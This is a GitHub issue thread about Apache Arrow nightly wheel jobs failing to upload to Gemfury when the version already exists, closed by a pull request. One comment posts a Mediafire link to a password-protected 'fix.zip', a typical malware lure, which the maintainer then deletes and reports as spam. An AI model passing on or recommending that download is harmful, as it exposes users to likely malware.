### ISSUE TITLE
[CI][Packaging][Python] Wheels nightly job fails if no new commits have happened since previous build

### ISSUE THREAD

**Issue by raulcd** [apache/arrow#43815]
### Describe the bug, including details regarding any error messages, version, and platform.

Usually seen on weekends, if no new commits have happened on the repo since the previous wheel jobs where executed and uploaded to gemfury.

The `fury push` command fails if the version used for the wheels is the same as the one that was uploaded previously with:
```
Uploading pyarrow-18.0.0.dev203-cp311-cp311-win_amd64.whl - this version already exists
There was a problem uploading at least 1 package
```

We could:
- Do not upload wheel if the same wheel version exists

As an example, all those wheels failed:
[wheel-macos-big-sur-cp310-arm64](https://github.com/ursacomputing/crossbow/actions/runs/10545493793/job/29215771720)
[wheel-macos-big-sur-cp311-arm64](https://github.com/ursacomputing/crossbow/actions/runs/10545494218/job/29215791887)
[wheel-macos-big-sur-cp312-arm64](https://github.com/ursacomputing/crossbow/actions/runs/10545493816/job/29215771780)
[wheel-macos-big-sur-cp313-arm64](https://github.com/ursacomputing/crossbow/actions/runs/10545493976/job/29215772424)
[wheel-macos-big-sur-cp38-arm64](https://github.com/ursacomputing/crossbow/actions/runs/10545493836/job/29215771835)
[wheel-macos-big-sur-cp39-arm64](https://github.com/ursacomputing/crossbow/actions/runs/10545494264/job/29215791987)
[wheel-macos-catalina-cp310-amd64](https://github.com/ursacomputing/crossbow/actions/runs/10545494186/job/29215791830)
[wheel-macos-catalina-cp311-amd64](https://github.com/ursacomputing/crossbow/actions/runs/10545494144/job/29215791702)
[wheel-macos-catalina-cp312-amd64](https://github.com/ursacomputing/crossbow/actions/runs/10545494302/job/29215791946)
[wheel-macos-catalina-cp313-amd64](https://github.com/ursacomputing/crossbow/actions/runs/10545493991/job/29215772512)
[wheel-macos-catalina-cp38-amd64](https://github.com/ursacomputing/crossbow/actions/runs/10545494080/job/29215772984)
[wheel-macos-catalina-cp39-amd64](https://github.com/ursacomputing/crossbow/actions/runs/10545493743/job/29215771458)
[wheel-manylinux-2-28-cp310-amd64](https://github.com/ursacomputing/crossbow/actions/runs/10545493765/job/29215771546)
[wheel-manylinux-2-28-cp310-arm64](https://github.com/ursacomputing/crossbow/actions/runs/10545494138/job/29215791561)
[wheel-manylinux-2-28-cp311-amd64](https://github.com/ursacomputing/crossbow/actions/runs/10545493638/job/29215770973)
[wheel-manylinux-2-28-cp311-arm64](https://github.com/ursacomputing/crossbow/actions/runs/10545493507/job/29215770522)
[wheel-manylinux-2-28-cp312-amd64](https://github.com/ursacomputing/crossbow/actions/runs/10545493718/job/29215771392)
[wheel-manylinux-2-28-cp312-arm64](https://github.com/ursacomputing/crossbow/actions/runs/10545494199/job/29215791831)
[wheel-manylinux-2-28-cp313-amd64](https://github.com/ursacomputing/crossbow/actions/runs/10545493674/job/29215771149)
[wheel-manylinux-2-28-cp313-arm64](https://github.com/ursacomputing/crossbow/actions/runs/10545493683/job/29215771182)
[wheel-manylinux-2-28-cp38-amd64](https://github.com/ursacomputing/crossbow/actions/runs/10545493739/job/29215771472)
[wheel-manylinux-2-28-cp38-arm64](https://github.com/ursacomputing/crossbow/actions/runs/10545494094/job/29215773083)
[wheel-manylinux-2-28-cp39-amd64](https://github.com/ursacomputing/crossbow/actions/runs/10545493964/job/29215772356)
[wheel-manylinux-2014-cp310-amd64](https://github.com/ursacomputing/crossbow/actions/runs/10545493508/job/29215770556)
[wheel-manylinux-2014-cp310-arm64](https://github.com/ursacomputing/crossbow/actions/runs/10545493924/job/29215772084)
[wheel-manylinux-2014-cp311-amd64](https://github.com/ursacomputing/crossbow/actions/runs/10545494013/job/29215772613)
[wheel-manylinux-2014-cp312-amd64](https://github.com/ursacomputing/crossbow/actions/runs/10545493937/job/29215772126)
[wheel-manylinux-2014-cp312-arm64](https://github.com/ursacomputing/crossbow/actions/runs/10545494155/job/29215791684)
[wheel-manylinux-2014-cp313-amd64](https://github.com/ursacomputing/crossbow/actions/runs/10545493568/job/29215770723)
[wheel-manylinux-2014-cp313-arm64](https://github.com/ursacomputing/crossbow/actions/runs/10545494200/job/29215791949)
[wheel-manylinux-2014-cp38-amd64](https://github.com/ursacomputing/crossbow/actions/runs/10545493512/job/29215770554)
[wheel-manylinux-2014-cp39-amd64](https://github.com/ursacomputing/crossbow/actions/runs/10545493901/job/29215772040)
[wheel-manylinux-2014-cp39-arm64](https://github.com/ursacomputing/crossbow/actions/runs/10545493625/job/29215770904)
[wheel-windows-cp310-amd64](https://github.com/ursacomputing/crossbow/actions/runs/10545494038/job/29215772750)
[wheel-windows-cp311-amd64](https://github.com/ursacomputing/crossbow/actions/runs/10545493698/job/29215771258)
[wheel-windows-cp312-amd64](https://github.com/ursacomputing/crossbow/actions/runs/10545494071/job/29215772978)
[wheel-windows-cp313-amd64](https://github.com/ursacomputing/crossbow/actions/runs/10545493588/job/29215770845)
[wheel-windows-cp38-amd64](https://github.com/ursacomputing/crossbow/actions/runs/10545493679/job/29215771173)
[wheel-windows-cp39-amd64](https://github.com/ursacomputing/crossbow/actions/runs/10545493694/job/29215771257)

### Component(s)

Continuous Integration, Packaging, Python

**Comment by projetosgppag** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by raulcd** [comment]
I've deleted and reported the comment above as it was spam.

**Comment by raulcd** [comment]
Issue resolved by pull request 43816
https://github.com/apache/arrow/pull/43816
